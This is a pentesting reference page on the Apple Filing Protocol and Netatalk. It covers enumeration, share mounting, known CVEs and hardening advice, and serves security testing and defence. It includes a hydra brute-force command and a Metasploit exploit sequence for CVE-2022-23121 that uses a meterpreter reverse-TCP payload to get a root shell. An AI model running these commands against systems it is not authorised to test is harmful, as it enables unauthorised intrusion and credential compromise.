# 548 - Pentesting Apple Filing Protocol (AFP) {{#include ../banners/hacktricks-training.md}} ## Basic Information The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms. Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in: * Legacy macOS / Mac OS 9 environments * NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source **Netatalk** daemon * Mixed-OS networks where Time-Machine-over-AFP is still enabled **Default TCP Port:** **548** (AFP over TCP / DSI) ```bash PORT STATE SERVICE 548/tcp open afp ``` --- ## Enumeration ### Quick banner / server info ```bash # Metasploit auxiliary use auxiliary/scanner/afp/afp_server_info run RHOSTS= # Nmap NSE nmap -p 548 -sV --script "afp-* and not dos" ``` Useful AFP NSE scripts: | Script | What it does | |--------|--------------| | **afp-ls** | List available AFP volumes and files | | **afp-brute** | Password brute-force against AFP login | | **afp-serverinfo** | Dump server name, machine type, AFP version, supported UAMs, etc. | | **afp-showmount** | List shares together with their ACLs | | **afp-path-vuln** | Detects (and can exploit) directory-traversal, CVE-2010-0533 | The NSE brute-force script can be combined with Hydra/Medusa if more control is required: ```bash hydra -L users.txt -P passwords.txt afp:// ``` ### Interacting with shares *macOS* ```bash # Finder → Go → "Connect to Server…" # or from terminal mkdir /Volumes/afp mount_afp afp://USER:[email protected]/SHARE /Volumes/afp ``` *Linux* (using `afpfs-ng` ‑ packaged in most distros) ```bash apt install afpfs-ng mkdir /mnt/afp mount_afp afp://USER:[email protected]/SHARE /mnt/afp # or interactive client afp_client ``` Once mounted, remember that classic Mac resource-forks are stored as hidden `._*` AppleDouble files – these often hold interesting metadata that DFIR tools miss. --- ## Common Vulnerabilities & Exploitation ### Netatalk unauthenticated RCE chain (2022) Several NAS vendors shipped **Netatalk ≤3.1.12**. A lack of bounds checking in `parse_entries()` allows an attacker to craft a malicious **AppleDouble** header and obtain **remote root** before authentication (**CVSS 9.8 – CVE-2022-23121**). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available. Metasploit (>= 6.3) ships the module `exploit/linux/netatalk/parse_entries` which delivers the payload via DSI `WRITE`. ```bash use exploit/linux/netatalk/parse_entries set RHOSTS set TARGET 0 # Automatic (Netatalk) set PAYLOAD linux/x64/meterpreter_reverse_tcp run ``` If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as **root**. ### Netatalk OpenSession heap overflow (2018) Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the **DSI OpenSession** handler allowing unauthenticated code execution (**CVE-2018-1160**). A detailed analysis and PoC were published by Tenable Research. ### Other notable issues * **CVE-2022-22995** – Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17). * **CVE-2010-0533** – Directory traversal in Apple Mac OS X 10.6 AFP (detected by `afp-path-vuln.nse`). * Multiple memory-safety bugs were fixed in **Netatalk 4.x (2024)** – recommend upgrading rather than patching individual CVEs. --- ## Defensive Recommendations 1. **Disable AFP** unless strictly required – use SMB3 or NFS instead. 2. If AFP must stay, **upgrade Netatalk to ≥ 3.1.18 or 4.x**, or apply vendor firmware that back-ports the 2022/2023/2024 patches. 3. Enforce **Strong UAMs** (e.g. *DHX2*), disable clear-text and guest logins. 4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely. 5. Periodically scan with `nmap -p 548 --script afp-*` in CI/CD to catch rogue / downgraded appliances. --- ### [Brute-Force](../generic-hacking/brute-force.md#afp) ## References * Netatalk Security Advisory CVE-2022-23121 – "Arbitrary code execution in parse_entries" * Tenable Research – "Exploiting an 18-Year-Old Bug (CVE-2018-1160)" {{#include ../banners/hacktricks-training.md}}